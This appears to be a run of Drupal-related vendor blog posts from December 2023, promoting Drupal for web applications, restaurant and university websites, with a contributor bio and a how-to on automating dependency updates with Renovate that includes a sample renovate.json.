Built-in block system – Drupal's block system allows effortless rearrangement of a web application's layout by dragging and dropping required blocks. This helps ensure design uniformity and content reuse across multiple pages.

WYSIWYG editor – The WYSIWYG editor in Drupal empowers users to preview text and images before publishing, enhancing the content creation process.

Responsive design – Drupal's responsive design ensures a seamless experience across devices, whether accessed through smartphones, desktops, or tablets.

Social media modules – Drupal simplifies social media connectivity with various integration modules, facilitating easy linking to platforms like Twitter and Facebook directly from the web application.

API-Friendly Architecture

Drupal's API-first initiative facilitates content creation and management, catering to various front-end applications. Its API-friendly architecture, including RESTful Web Services API, JSON:API, Render API, and Translation API, ensures a streamlined and enriched customer journey. 

What makes Drupal API-friendly?

Every modern CMS should ideally have access to robust APIs and integrate them across every stage of the customer journey for a better experience. The latest releases of Drupal have announced various APIs like:


RESTful Web Services API - It is known for supporting a decoupled Drupal website. It is responsible for the communication between native mobile applications and a specific Drupal website. Also, it takes care of web services integration.

JSON:API - This module has simplified integrations by allowing serialization and communication through JSON. 

Render API - It includes improved caching protocols and ensures faster page rendering to elevate the overall user experience. 

Translation API - This Drupal API plays a vital role in adjusting the language on the web application according to prospect/visitor geographies.

SEO Optimization

Since Drupal 7, the platform has excelled in SEO optimization. Leveraging semantic structure and RDF support, Drupal optimizes content for search engines, utilizing alt and title tags effectively. A Forrester report acknowledges Drupal's semantic approach as crucial for content managers and authors, further solidifying its position as a leading CMS for SEO.

An Interesting Story: Transforming Legacy.com's Editorial Section with Drupal

Empowering the editorial segment of Legacy.com's global online obituaries platform has been a remarkable journey. With partnerships spanning 1,500+ newspapers and 3,500 funeral homes, Legacy.com serves 40 million unique visitors monthly. It faced the challenge of launching Drupal CMS within six months. Read how Axelerant collaborated with Facet Interactive to deliver an enterprise-level headless Drupal platform, optimizing media organization, content publishing speed, and comprehensive support for newspapers.

Drupal's Search Engine Friendliness Unveiled:

SEO Modules:

Drupal's SEO prowess extends through modules such as SEO checklist, XML Sitemap, Global Redirect, SEO compliance checker, and Pathauto. The Metatag module stands out, enabling the effortless addition of meta tags to enhance SEO. Notably, it allows control over content appearance on social media channels, adding an extra layer of SEO value.

Intuitive Taxonomy System:

Drupal's flexible taxonomy system simplifies content organization using keywords. This not only aids in organizing information thematically but also ensures user-friendly navigation through search terms.

Unmatched Security


Because Drupal is an open-source CMS platform, its codebase is always closely scrutinized. As the code that powers Drupal is freely available to everyone for review, use, modification, and contribution, it's imperative to ensure that the code is top-notch. Since there are millions of people contributing to this code, it is reviewed by a large number of eyes worldwide, which leads to optimum security.

In the case of using a closed source CMS platform, there is no clarity about the potential security flaws present within the software. Due to its ability to handle extremely crucial data, Drupal has been a preferred CMS for web applications that are created for government, leading financial institutions, and popular e-commerce brands.

Why is Drupal so secure?

To give your web application a high level of security, Drupal comes with a list of various security modules that include: 

Drupal Login Security – This module enables the administrator to impose several restrictions on user login. It can limit the total number of invalid login attempts allowed before an account is blocked. It also allows administrators to deny access to specific IP addresses. 

Two-factor Authentication – With this security module, you get a second layer of authentication after a user logs in to your application with a specific user ID and password. This involves entering a code received by email or on a mobile phone. 

Password Policy – This module plays a key role in making your login forms more secure, thereby keeping bots and possible security breaches at bay. It enforces various restrictions at the time of password setting, such as constraints on the character type, length, case included (uppercase/lowercase), etc. It also comes with a password expiration feature that asks users to regularly change their passwords.

Content Access – This module gives you detailed access control over content. By specifying view, edit, or delete permissions for each content type, you can manage access on the basis of role and author.

Coder – If there are any loopholes in your code, an attacker is likely to steal your information. The Coder module scrutinizes your Drupal code to uncover the areas where coding practices aren't followed properly.

Read more about the different security modules powered by Drupal.

Uncovering the flow of Drupal

Before considering Drupal to build your web application, it's essential to take a sneak peek into the system's layers between which the information is passed. Drupal comes with a set of 5 layers, namely: 
 


Data (Nodes, etc.)

At the foundation lies the data layer, encompassing all nodes and serving as the data pool where information is input before display.

Modules

The second layer in the Drupal flow is modules. Modules can be defined as the functional plugins that are built on the core functionality of Drupal. They can either be a component of the Drupal core (when shipped with Drupal) or contributed items that are specially developed by Drupal community members. These modules enable you to seamlessly customize the data items on your specific node types, create e-commerce from scratch, sort and display the required content programmatically, and more. There is a myriad of options in the continuously evolving repository of the Drupal modules that indicate innovation as well as the collaborative effort of the community members. 

Blocks & Menus

The next layer in the Drupal flow comprises blocks and menus. Blocks display the output of a particular module and can be created to represent anything you want. These blocks can be placed in several spots (called regions) inside the template layout that you use and can be effortlessly configured to output in different ways. Menus are used for navigation in Drupal and help define the content that appears at each respective menu path (i.e. the relative URL). They play a crucial role in providing links to all the different pages that have been created in Drupal. 

User Permissions 

In this stage, the settings are configured to control what different users can see and are allowed to do. These permissions are usually defined on the basis of specific roles, so that different users are granted different defined permissions. 

Template 

This layer involves the site theme and is mainly made up of XHTML and CSS. Due to the intermixing of the Twig variables, the content generated in Drupal can easily go into the relevant spots. With each theme, there's a defined set of functions used for overriding the standard ones in the listed modules. This helps to gain full control over how different modules create their markups during the output.  

Conclusion

Drupal's search engine friendliness, unmatched security features, and layered flow make it an unparalleled choice for web application development. As the digital soul of the brand, your web application deserves the modular excellence and robust configurations that Drupal offers. If you are seeking exceptional web applications, connect with Axelerant's experts to learn more.

Dec 05 2023

Michael E. Meyers joined Tag1 Consulting as Managing Director in 2017 after a decade of working with the team on many projects.

Prior to joining Tag1, Michael was VP of Developer Relations at Acquia, responsible for developer marketing & events, developer relations, and helped launch the developer products group. Michael co-founded & was CTO of NowPublic.com, the first venture-backed Drupal based startup that pioneered citizen journalism. With the help of Tag1, he grew NowPublic into a top 500 website. As CTO of The Clarity Digital Group, which acquired NowPublic, Michael and the Tag1 team rebuilt Examiner.com, the first Drupal-based top 100 Internet site, and the leading contributor to Drupal 7.

Michael has made major contributions to and helped establish Drupal as one of the most successful open source platforms; He’s an advisor to the Drupal Association board and several startup companies.

Dec 05 2023

Introduction

The restaurant industry has been going through a rough patch, with the economy taking a nosedive. Recovery from this issue is possible through business agility, and 71% of food businesses accept digital transformation as a crucial factor in accomplishing that goal.

However, as more restaurants join the online space, the need for a Restaurant CMS becomes more prominent. The right Restaurant website CMS, like Drupal, can help businesses streamline their function.

Why Drupal Is The Right Restaurant CMS

With over 20 years of experience in restaurant content management, Drupal has been the go-to site for several large companies and restaurants. Around 89.2% of the users believe Drupal will gain more popularity among enterprises in the next three years, irrespective of industry. This means the need for a Sports CMS and an Education CMS will also increase. 

The Content Management System industry has been exploding. But Drupal stays on top of the ladder for many reasons, including its efficient and highly responsive websites, fluid designs with high resolutions, and easy adaptability. 

According to statistics,

Drupal Usage in world

Drupal explores the restaurant content management system with the market's future needs. Restaurants prosper when connected with this platform as it allows them to communicate with regular customers, give additional coupons on reservations, help with email newsletters, and enable digital menu management.

These key features are essential in today's market to stay connected with customers, build a loyal community, and further expand online visibility. Investing in Drupal development is pivotal in adding brand value to restaurants. 

Drupal is also easily accessible to all users. The Point of Sale (POS) system is designed to add value and brand name to the restaurant craftily. It is also highly functional on macOS, Windows, and Linux.

Restaurant POS

Drupal provides an integral POS system that can help a restaurant enhance its brand value and visibility by allowing it to:

  • Track Order: With Drupal's efficient means, tracking orders and increasing the restaurant's efficiency is easier.
  • Manage Menus: In a digital world, menu management for restaurants has become easier due to the shift to digital menus. With Drupal’s effective CMS, one can easily manage menus regularly. 
  • Easy Bill Payment: No customer has the time and energy to wait to pay the bill. Drupal allows restaurants to have a digital, easy, and fast mode of bill payment. This builds trust and gives scope for growth.
  • Multi-Device Accessibility: Drupal connects restaurants with all customers through an efficient website and features.

A Short Tale: Deploying A Decoupled Drupal Platform For A Luxury Resort Chain

A popular chain of luxury resorts known for providing entertainment and casino facilities in Asia and Europe needed a unified content management platform. The organization wanted to ensure consistency across all brands.

With a plethora of content scattered across different websites, they faced issues related to disparate web tools, inconsistent branding, and poor user experience. Read how Axelerant helped them simplify content management, deliver modern user experiences, and expand their market presence with a decoupled Drupal platform.

Factors That Make Drupal An Ideal Restaurant CMS

Drupal has many factors that make it the best CMS for a restaurant website, including:

Security Management

In restaurant websites, customer data is safely secured on the local cloud to ensure customers' data safety and privacy. Tight control is kept on bill payments, card information, and personal details. This builds trust with customers. 

Multi-Lingual Support

Restaurants are places for people to blend in, experience the local culture, and feel connected. Through the multi-lingual support of Drupal, the experience for every part of the restaurant becomes simple, connective, and efficient.

Analytics

Deep analytics lets one quickly understand the customers' and markets' needs. It gives the user an understanding of the competition, insight into what is working for its customers, and how the business can strive to grow further.

Personalization

One can quickly create an interactive website with various themes and widgets that allow personalization. This feature helps the website get in sync with the overall feel of the dining experience. This goes a long way in providing customers with a memorable experience and building brand value.

Testing And Experimentation

Drupal CMS is intuitive and has endless creative possibilities due to automated testing and experimentation options. The CMS helps build a platform quickly, check, test, and ensure the website's proper functioning.

Scalability

Drupal has been the leading content management system for over two decades. Every eatery's needs are met with scalable websites hosted by Drupal, from exclusive restaurants to high-class bars to up-and-coming cafes.

While alternatives specializing in CMS are available, the general Drupal CMS helps build a site that suits the market and customer needs effortlessly without incurring the high expenses of a developer.

Exceptional Services

With a wide array of options in Drupal, businesses can create a website that becomes the go-to place for their creative presence online. Drupal makes it easy to introduce features, like QR ordering, online ordering, and recipe management, that help deliver exceptional customer service.

Essential Features To Include In A Restaurant CMS

Every Restaurant CMS should have a few essential features like:

Mobile-Friendly Design

Almost everyone is a smartphone user and finds it the most convenient means to look for information. This is why restaurants need to have mobile-friendly sites. Accelerated mobile pages help attract the target audience and keep them hooked to the site with its high usability and convenience.

Accurate Information

A highly efficient website should be based on authenticity and cultural value. This builds a sense of customer reliance and allows them to explore a site further with trust. It also allows customers to connect with the core values of an organization.

Page Speed Insights

With page speed insights, one can understand how long it takes for a page to load, how it works overall, and how efficient it is. This, in turn, provides insight into how user-friendly the website is. With Drupal, this is a crucial feature that allows restaurants to keep their customer base intact.

Email Retargeting

First-time customers are a great source of business if converted to regular customers. Email retargeting allows a restaurant to reconnect with first-time customers and keep them hooked to the brand. This is a great way to expand the business and create a name in the local and overall niche market.

Drupal Features

The Conclusion

Drupal has been and aims to stay a go-to CMS and help restaurants get the online presence they need to become the next big thing. From one-time customers to regular ones, conversion is a small step.

Shifting to Drupal CMS can allow a restaurant's staff to connect effectively and work while maintaining strong relationships with customers. Opt for a Drupal development service if you want to make this happen.

The experts at Axelerant excel at elevating the online presence of restaurants. Get in touch to know how they can help you.

Dec 05 2023

 

Selecting the right Education Content Management System (CMS) for your institution is a critical decision in the current digital landscape.

As universities adapt to the "new normal" of a digital-first era, the impact of COVID-19 on higher education has been unprecedented, leading to uncertainties about the upcoming semesters globally.

In response to this digital paradigm shift, leaders in higher education are proactively preparing for the future.

“Not everybody's going to survive, for people who are forward-thinking, fast-pivoting, opportunistic visionaries, this is a really exciting time to be in higher ed. But it's also quite scary because 20% of colleges aren't going to make it.”

- Dr. Nancy Hubbard, University of Lynchburg

The central question arises: What is the most crucial aspect to get right in this digital evolution? The answer is your website. Serving as the online identity of your institution, the website is the platform that attracts, engages, and delights prospective students, shaping their seamless experience.

Outdated and lackluster education websites have a direct impact on the reputation of universities among prospective students, parents, and potential hires. This, in turn, affects enrollment rates, potentially leading to a significant loss of revenue, estimated at up to $19 billion collectively.

Education Content Management System

Achieving a seamless online experience hinges on the choice of an integrable Education Content Management System (CMS). In higher education, these CMSs go beyond supporting digital marketing or communications; they serve as central tools for staff, faculty, students, and others. Modern login portals must surpass the functionality of past systems like "angel systems" or "blackboard systems."

Choosing the right Education Content Management System can be daunting, given the myriad tasks prospects want to perform.

NYC Design research on 3,360 higher ed websites, including prestigious institutions like Stanford University, University of British Columbia, UC Berkeley, University of Michigan, and Cornell University, reveals that 90% of these sites are built using twelve education Content Management Systems.

Top education content management systems used by education institutes

Among these CMSs, WordPress and Drupal emerge as leaders, capturing 40.8% and 19.1% shares, respectively, as of 2023. The choice between WordPress and Drupal depends on the institution's type and specific needs. While WordPress is popular for its user-friendly interface and affordability, Drupal dominates among larger, more premium universities with complex requirements.

For instance, the top five US universities, including Harvard University, Stanford University, Massachusetts Institute of Technology (MIT), University of California, Berkeley (UCB), and the University of California, Los Angeles, have chosen Drupal development services. This preference reinforces Drupal's status as the preferred CMS for larger institutions seeking a robust platform to meet their diverse and complex needs.

Princeton, Stanford, University of East London, University of Dundee — the world’s top schools build better .edu sites and create great digital experiences with Drupal. Today, Drupal is the most widely used content management system in higher education, with 71% of the top 100 universities relying on the open source content management system to drive their digital strategy.

Should I Choose an Open Source Education Content Management System in 2024?

Do you wish to control the destiny of your website and deliver an orchestrated experience to your students and faculty? As quoted by Linus Torvalds:

“In real Open Source, you have the right to control your own destiny.”

Controlling the destiny of your institution's website and delivering an orchestrated experience to students and faculty is a crucial decision. With approximately 60% of university websites built on an open-source CMS, opting for this approach becomes the optimal choice for higher-ed tech leaders in shaping their university or college platform.

An open-source education content management system seamlessly ties together services, data, and content across any tech stack. This integration facilitates the delivery of orchestrated digital experiences across channels in an agile manner, leading to a transformation that enhances the flexibility and resilience of institutions in the long term.

What Is An Open Source Education Content Management System?

An open-source website employs open-source software (OSS), allowing anyone to inspect, modify, and enhance the source code. Notably, Drupal stands out as one of the most popular open-source content management systems for higher education institutions. Marketers, developers, and CxOs in higher education can effortlessly connect with open-source community groups globally, engaging in platforms such as Drupal camps and conferences, where IT professionals from academic institutions actively contribute.

How Anne Margulies contributes to the Drupal community

Reasons To Use An Open Source Education CMS

In a fast-paced digital landscape marked by technological growth and transformation, the success of a digital strategy hinges on agility, scalability, accountability, and flexibility. While proprietary technology has its benefits, the guarded secrecy of its source code contrasts with the transparency essential in education. Open-source CMS emerges as a superior option for university websites.

Key reasons for universities to embrace Open Source Education Content Management Systems include:

  • Large Developer Communities: Tap into collaborative knowledge and support from a vast community.
  • Widely Adopted: Open Source CMSs like Drupal are widely embraced in the education sector.
  • Ease in Academic Publishing: Facilitate seamless academic content publication and management.
  • High Security: Prioritize security, a critical aspect for educational institutions.
  • Affordability: Open Source solutions offer cost-effective alternatives to proprietary technologies.

There are a considerable number of Open Source education Content Management Systems available in the market. Which one should you choose, and what factors should you consider while selecting the right higher ed Content Management System?

This CMS Evaluation Framework may help you to make an informed decision.

Reasons To Choose Drupal as Your Higher Ed Content Management System

Amid the impact of COVID-19 on students' willingness to enroll, it is imperative to revolutionize the student experience, affirm their decisions, and provide a personalized engagement journey from enrollment to graduation. Campus activities, including tours, living arrangements, and dorm life, remain uncertain, leading to a significant decline in campus visit requests.

Students' unwillingness to return to college, as per report

We have to keep in mind that campus tours, campus living, dorm life, etc. are still uncertain in the coming semester.

36% of institutions are experiencing a steep decline in campus visit requests, and the number of campus tours is expected to drop further.

Just like businesses offering work-from-home or flexible arrangements, it’s likely institutions of higher ed will have to do this in light of any negative C19 developments (of which Delta is one).

What does this mean?

The campus tour is less powerful than it used to be: it’s more complicated and subject to devaluation. What is certain is the importance of your digital platform, the site that represents the institution. The portal. The entire UX. And this digital tour or walkthrough? It just became more important, perhaps even more important than the “campus tour.”

In this era where students may interact more with .edu than their physical classrooms, the importance of the institution's website has surged. A powerful and flexible open-source education content management system is the answer, with Drupal standing out as the choice for 70% of the top higher education institutions' websites.

Drupal's adaptability and flexibility position it as a reliable CMS option, aligning seamlessly with the evolving needs of higher education in 2023.

1.  Marketing

Here is how a student's journey on a university website typically begins when they search for an online program to enroll in:

  a. They start online research for their desired program
  b. They shortlist a few university websites
  c. They complete the first application form

Two-thirds of students often complete step (c) within just four weeks of starting online research. This means universities have four weeks to keep pace with the prospective student's decision-making speed and offer them a personalized, engaging experience.

And here, marketing offerings, at speed and scale, in a personalized manner play an important role. Thus, big higher ed players spend on marketing heavily to increase the online enrollment rate, which is evident from the following analysis.

The CMO Survey conducted by Duke University highlights that amongst the 15 industry sectors, the use of Digital Marketing, with a mean degree of 6.20, has contributed the most in the education sector. Unsurprisingly, the more a university spends on marketing initiatives, the higher is the enrollment rate.

A report mentioning higher spending on marketing leads to higher enrolment

The Digital Marketing ecosystem includes all the digital channels an institution uses to communicate with its prospective students, nurture them till they are ready to enroll, convert them and promote new enrolments from actual students. 

To make their Digital Marketing initiatives a success, higher ed marketers do need data about geolocation, prospect demographics, and previous history. However, they also need data about what their prospective students are doing and looking for right now.

Unfortunately, in most institutions, this type of data resides in silos and the technology that could orchestrate this prospect journey is not connected effectively to the martech stack.

“There is a lot of data out there, the key is to learn how to leverage that data to provide the best experience for your prospective audience.”

- Luci Geraci, Executive Director, Web & Digital Marketing, Council on International Educational Exchange

Drupal is a powerful answer to this challenge. Being an Open Source education content management system, Drupal is easily integrable with existing systems using open APIs that allow student data to flow seamlessly throughout the institution. Also, Drupal-based digital properties allow higher ed marketers to collect key prospect data that help them to design a comprehensive view of prospects.

Drupal education content management system integrations

With Drupal marketing, higher ed marketers can:

  • Get a 360-degree view of prospects
  • Streamline campaign management
  • Connect systems and data sources with open APIs
  • Build memorable experiences across platforms with multi-channel reach
  • Deliver global experiences in any language, with multilingual functionality

As a robust Higher Ed Content Management solution, Drupal is behind many of the digital experiences that are part of the marketing efforts of leading universities. There are several Drupal marketing modules created by the Drupal community that can be used with Drupal sites to help with marketing initiatives. Some of the top Drupal Digital Marketing modules are as follows:

  • Webform: It is an essential building block that integrates Drupal and other third-party marketing automation software.

    MicroAssist Inc., an Austin-based technology training and consulting company, relaunched its website on Drupal and added the Webform module to the site. Their marketing team was super-excited about Webform's ability to quickly and effectively build different types of forms.
     

  • Mautic: Mautic allows for multi-channel communications and campaign management, content customization, email marketing, visitor tracking, and personalization, to name a few. 

    Mautic is an Open Source marketing automation platform acquired by Acquia. The community version of Mautic lacked the ready-to-use plugins required by the Acquia marketing team. They collaborated with Axelerant to develop Mautic plugins to extend functionality.

A case study on how Axelerant helped Acquia to migrate from Marketo to Mautic

  • Google Analytics: The Google Analytics Drupal module allows marketers to add a web statistics tracking system to the website. It helps track and monitor search systems, Adsense, custom code snippets, and much more.
     
  • HubSpot: The HubSpot Drupal module integrates seamlessly with Webform and the HubSpot API. The entered information of a user on Drupal Webform is sent to HubSpot’s lead management tool, which is further tracked and nurtured.
     
  • Search API Solr: The Search API Solr Drupal module helps configure Solr search on a Drupal website. It works in collaboration with the Search API module, for which it provides an Apache Solr backend.

2. Accessibility

Education should be available to all, irrespective of caste, creed, gender, or native language. But the challenge is how to make it fully accessible - 71% of users with a disability leave a website that is not accessible to them.

“So if a college education is indispensable, the challenge as I see it is how to make it more accessible.”

- Gordon Gee

In 2016, a visually impaired student's lawsuit against Miami University underscored the critical importance of web accessibility. The university, faced with inaccessible websites, had to pay $25,000 in compensation and overhaul its web content to meet federal accessibility standards. Such incidents highlight the ethical responsibility of universities to ensure equal access to educational resources.

The exploration of ethical practices by students during the university selection process reveals a growing awareness of accessibility issues. Lawsuits against universities failing in this regard indicate a need for institutions to prioritize ethical responsibilities.

However, auditing websites for accessibility is a complex and resource-intensive task. Scott Lissner, Americans With Disabilities Act compliance officer at Ohio State University, humorously captures the enormity of the challenge, stating that the number of webpages at Ohio State is "somewhere between five and eight million, depending on what definition you're using and what moment in time it is."

Enter Drupal, a comprehensive education content management system (CMS) designed to meet the demands of the digital ecosystem while adhering to accessibility standards. Drupal's commitment to accessibility is evident through features designed to enhance user experiences for people with disabilities:

  • Accessible inline forms:
    • Challenge: Visually impaired users may struggle with error notifications on form submissions.
    • Solution: Drupal introduced the Inline Form Errors module, aiding visually impaired users in identifying errors by providing alternative formats for error notifications. 
  • Anyone can easily add alt text and tags: 
    • Challenge: Embedded images on websites may lack accessibility for visually impaired audiences.
    • Solution: Drupal mandates alt text (alternative text) for images, ensuring that meaningful descriptions accompany images, making them accessible to all users.
How Drupal CMS takes care of accessibility by making sure you add alt text to the image
  • Seamless management of tabs: 
    • Challenge: Non-visual and non-mouse users face difficulties navigating webpage elements.
    • Solution: Drupal's TabbingManager, a JavaScript feature, allows logical access to critical page elements. Higher ed marketers can precisely control the tabbing sequence, enhancing the experience for users who rely on keyboard navigation.
The education content management system of the University of Arizona helps them build websites with accessibility features

In essence, Drupal not only acknowledges the significance of accessibility but actively integrates features that contribute to a more inclusive digital environment. By choosing Drupal as the CMS, education institutions align themselves with a commitment to providing accessible and equitable educational opportunities for all.

3. Personalization

In the digital age, students expect a personalized online experience akin to that of industry giants like Amazon and Netflix—seamless, orchestrated, relevant, and immediate. Recognizing this, 70% of higher education leaders consider digital engagement and websites as paramount marketing tools to attract, engage, and convert prospective students.

A student-centric engagement platform strives to deliver a highly personalized experience both before and after enrollment. For instance, Arizona State University (ASU) and Southern New Hampshire University (SNHU) leverage predictive analytics to identify academically struggling students and provide timely interventions. These personalized experiences foster lasting engagement among modern learners.

Drupal has adeptly seized this opportunity to provide 360-degree digital experiences that are not only relevant and immediate but also personalized. Leveraging browser history, geolocation, behavior taxonomies, and device type, Drupal enables users to capture user interactions at every touchpoint. This information allows for the curation of a comprehensive vision of personalized offerings, ultimately enhancing retention and online enrollment rates.

An exemplary instance is the Stanford University website, which harnesses Drupal to empower campus members to effortlessly design, build, grow, and manage brand-standard sites. These sites are tailored to individual needs, all while prioritizing security.

4. Security 

Security is a paramount concern for higher education decision-makers, given the frequent targeting of college websites. In this context, the choice of a digital platform becomes crucial. Open source software (OSS) is generally considered more secure than proprietary software, and Drupal stands out in this regard.

Drupal's security team is highly responsive and proactive, consistently monitoring vulnerabilities and issuing frequent security fixes for all actively maintained versions. The team follows a "coordinated disclosure policy," maintaining issue privacy until a fix is published. The Drupal Security Team's thoughtful communication ensures that users are well-informed and can take necessary actions.

“The Drupal Security Team follows a "coordinated disclosure policy": issues remain private until there is a published fix. A public announcement is made when the threat has been addressed and a secure version of Drupal core is also available. Even when a bug fix is made available, the Drupal Security Team is very thoughtful with its communication.”

- Dries Buytaert, Drupal Founder

Over the years, Drupal has demonstrated its resilience against critical security vulnerabilities, including those identified by OWASP in their top 10 security risks. The decrease in vulnerabilities from 2002 to 2021 attests to Drupal's commitment to providing a robust and secure education content management system. Frequent minor releases, especially after the introduction of Drupal 8 and 9, underscore Drupal's dedication to continuous innovation and the delivery of secure updates.

 Number of vulnerabilities on Drupal year-by-year

5. Multisite Architecture

In the landscape of higher education, where institutions manage diverse websites serving various functions, Drupal emerges as a robust solution for content management systems (CMS). The built-in multisite functionality of Drupal provides universities and colleges with a versatile toolbox, empowering individual departments to communicate effectively with students, staff, and users through a unified system. This multisite capability not only allows for independence in managing websites but also significantly reduces administrative overhead for IT offices.

When to Multisite and When Not

| Sr. No. | Factor | Consider Multisite | Don't Consider Multisite |
|---|---|---|---|
| 1 | The sites are for the same client and it is to simplify the scope of each site | ✓ | |
| 2 | The sites are similar in functionality, use the same modules or use the same Drupal distribution | ✓ | |
| 3 | You have limited resources/staffing, but lots of sites to manage and maintain | ✓ | |
| 4 | The functionality or scope are different | | ✓ |
| 5 | You are managing multiple distributions | | ✓ |
| 6 | The clients are different | | ✓ |

An illustrative example of Drupal's multisite prowess is evident in OpenScholar, a research collaboration platform. OpenScholar's multi-tenant, robust, and modular architecture enables academic institutions to host thousands of websites within a single instance.

Axelerant's collaboration with OpenScholar involved implementing test automation systematically across the entire testing pyramid, contributing to quicker releases. Leveraging Organic Groups and Spaces modules, OpenScholar enables a single Drupal installation to host complete and discrete websites.

The platform supports custom domains, facilitating the seamless transfer of existing websites to OpenScholar, including the management of custom URLs within the site settings area of the control panel.

 

A Quick Tale

Delivering Seamless Digital Experience by Building Scalable Multisites for a Leading Research University

Axelerant's expertise shines in a case study involving a renowned public research university established in the mid-19th century. Facing scalability challenges with multiple websites built on PHP, the university sought Axelerant's assistance.

Read the case study to know how Axelerant leveraged its experience to help the client deliver a world-class user experience, enabling them to build pages with ease.

6. Community Support

The success of the Drupal CMS platform is underlined by its extensive and devoted community. Some key Drupal facts highlight the platform's widespread adoption and user satisfaction:

  • Over 1.7 million websites use Drupal
  • 7% of the top 10k websites use Drupal
  • 97% of Drupal users are satisfied with it
  • 46,603 Drupal modules can be downloaded for free
  • In 2020, Drupal welcomed 8,000 individual contributors and over 1,200 corporate contributors

A pivotal aspect of Drupal's success is its vibrant and inclusive community. Drupalers, drawn to the platform for coding, find a community that becomes a family. Their commitment to strengthening and experience-driving the community is evident in their daily efforts.

“We believe that the Drupal project benefits from a diverse contribution pool, and we strive to foster a welcoming and inclusive culture everywhere Drupal exists — at events, online, and in our workplaces.”

- Drupal’s statement of values

Drupal is a common thread that weaves together Drupalers worldwide, without discrimination, with a single mission: the more you give, the more you get. And Drupalers happily volunteer their time in Drupal communities because it is fun, engaging, challenging, meaningful, and enjoyable.

At Axelerant, we eat, sleep, and breathe Drupal. We always look for different ways to give back to the Drupal community and prepare hard for Drupal events to leave a mark, learn from other Drupalers, implement the learnings, and come back prepared for the next engagement.

Axelerant Drupal community contributions

Even many university CIOs and academic I.T. leaders have evolved and opened up Higher Education by bringing Open Source projects to campus—at times subtly, sometimes hyperactively. This forwards the general mission of every university: to disseminate and expand knowledge and information across communities. Adopting Open Source software allows universities to put more into this mission.

Some community group examples are:

  • Drupal Group: Higher Education
  • Drupal Group: Drupal in Education
  • Drupal Group: Drupal for K-12 Schools
  • Drupal Group: Higher Education Europe
  • Drupal Group: Open Data in Education
  • Drupal Group: ELMS
  • Drupal Group: LMS (Learning Management System)
  • Stanford Web Services Blog
  • Edu Drupal Unconsortium

Wrap Your Website With An Experience-driven Higher Ed CMS Platform: Drupal

In conclusion, Drupal's prowess in multisite architecture, coupled with its vibrant community support, positions it as a premier choice for higher education institutions seeking an experience-driven CMS platform.

In times of crisis, Drupal remains a steadfast partner, guiding the education industry through digital paradigm shifts while upholding the core mission of empowering informed citizens. Drupal's living, breathing digital platform ensures not just engagement but a seamless experience, contributing to its prevalence in over 70% of the top universities as their chosen education content management system.

Dec 04 2023

Manually maintaining a Drupal website is time-consuming, especially for a small team already busy with new features and bug fixes. When the Drupal Security team announces a new security update, this requires one or more members of the development team to:

  1. Stop what they are currently doing
  2. Apply the update and create a new pull request
  3. Test the security update

Add in other non-critical updates, and a development team will spend a significant amount of time on something that, while necessary, doesn't seem to add much value. If you have multiple websites and codebases, this problem becomes even worse. It could easily become someone's full-time job to do nothing but package updates.

Why you should automate these updates

You need to update your codebase. It's nonnegotiable. It keeps your website secure and might even address bugs your team has been working on or bugs they haven't yet identified. But you can make the process much easier without the huge administrative lift every time.

Automating your updates solves a lot of problems. When set up correctly, automation will update each package independently, one pull request at a time, making identifying and fixing regressions easier. If you combine automated updates with end-to-end testing, you will have more confidence that new problems are not being introduced.

One of our support clients has twelve different Drupal repositories (as well as multiple WordPress websites) with an in-house team of three developers and one designer. Doing only security updates on these websites took us 30 hours per month. When the time came to upgrade from Drupal 8 to Drupal 9, there was a large backlog of non-security updates to perform, which slowed down the process.

For each update, the client also did extensive QA testing and scheduled that testing weeks in advance. If they discovered any problems, all other releases would be blocked. It would take another few weeks to review the next round of fixes because of the scheduling, even if it were a one-line change.

Once these updates were automated using Renovate, it was just a matter of keeping up with all the latest changes, improvements, and bug fixes released with minor version updates. With end-to-end and visual regression testing, a developer only needs to be involved when an automated test or build fails. Having Renovate (properly configured) is like having an extra developer on your team.

What is Renovate?

Renovate is a tool for automating the updating of dependencies in software projects. It can scan your software repositories, identify out-of-date packages, create branches, and submit pull requests for each one. Renovate supports a wide range of programming languages and platforms like PHP and NodeJS.

To use Renovate in its basic form:

  • Set Up: Install Renovate from your package manager or the platform-specific distribution.
  • Configuration: Create a configuration file, renovate.json, in the root of your repository. This file dictates how Renovate will behave – which dependencies to update, how often, etc. See the example below.
  • Running: Execute the Renovate tool, which will scan your repository for outdated dependencies based on your configuration.
  • Review & Merge: Renovate creates pull requests (or merge requests) for each dependency update. Review the changes and merge them if everything looks good.

You can leverage many other advanced features and configurations, such as grouping multiple dependency updates into a single PR, scheduling when updates should occur, and more.

Setting Renovate up varies between Git hosting providers. The easiest is GitHub because it's accessible in the GitHub Marketplace.

Are there other options?

We've also tried Violinist.io and Dependabot.

Dependabot's configuration was very limited for our needs, and some features have been removed since being acquired by GitHub. Overall, it's a little harder to work with.

We used Violinist.io on some projects that were not using GitHub. Configuring Dependabot for Bitbucket and GitLab takes more work because you must set up custom runners or pipelines.

Our experience has shown that, over time, Violinist.io has failed to create automated pull requests if/when there are minor issues with composer. Even something like an out-of-date patch, though unrelated to the package it's attempting to update, can halt the entire process. Once it fails, it creates a backlog of pending updates. We haven't had these issues with Renovate because of its flexible configuration.

Our Renovate configuration and preferences

Renovate integration is free, and once it is connected, it will open a pull request for the bare minimum configuration to start looking for package updates. We build upon this base configuration to group some packages together and set up rules around automerging. 

For example, we allow automerging during off-peak hours to avoid rebasing pull requests when others are actively working on the site. We also set branch protection rules that require certain tests to pass before Renovate is allowed to automerge. We only allow minor and patch releases to automerge because we want a developer to review any major version upgrade.

Here's an example of a renovate.json we've been using on our projects.


{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": ["config:base", "group:symfony"],
  "timezone": "America/New_York",
  "automergeSchedule": ["every weekend"],

  "rebaseWhen": "auto",
  "platform": "github",
  "baseBranches": ["main"],
  "prConcurrentLimit": 2,
  "rangeStrategy": "bump",
  "branchPrefix": "renovate/",
  "automerge": false,
  "packageRules": [
    {
      "matchManagers": ["composer"]
    },
    {
      "matchManagers": ["npm"]
    },
    {
      "matchPackagePrefixes": ["stylelint"],
      "groupName": "Stylelint packages"
    },
    {
      "matchPackageNames": [
        "drupal/core",
        "drupal/core-recommended",
        "drupal/core-composer-scaffold"
      ],
      "groupName": "Drupal Core"
    },
    {
      "matchPackageNames": ["lullabot/drainpipe", "lullabot/drainpipe-dev"],
      "groupName": "Drainpipe"
    },
    {
      "matchPackagePrefixes": ["gulp"],
      "groupName": "Gulp packages"
    },
    {
      "matchPackagePrefixes": ["jquery"],
      "groupName": "jQuery packages"
    }
  ]
}
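
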